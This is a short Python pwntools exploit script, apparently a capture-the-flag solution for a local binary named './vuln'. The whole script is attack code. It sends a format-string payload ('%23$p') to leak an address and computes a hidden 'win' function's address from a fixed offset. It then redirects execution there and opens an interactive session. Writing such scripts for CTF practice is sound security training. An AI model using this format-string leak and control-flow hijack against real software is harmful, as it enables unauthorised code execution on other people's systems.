#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./vuln", checksec=False)
r = process()

# funcs
s = lambda a: r.sendlineafter(b":", a)

# leak
s(b"%23$p")
main = int(r.recvline(), 16)
log.info("main: %#x", main)
win = main - 0x96
log.info("win: %#x", win)

# jmp
s(str(hex(win)).encode())

r.interactive()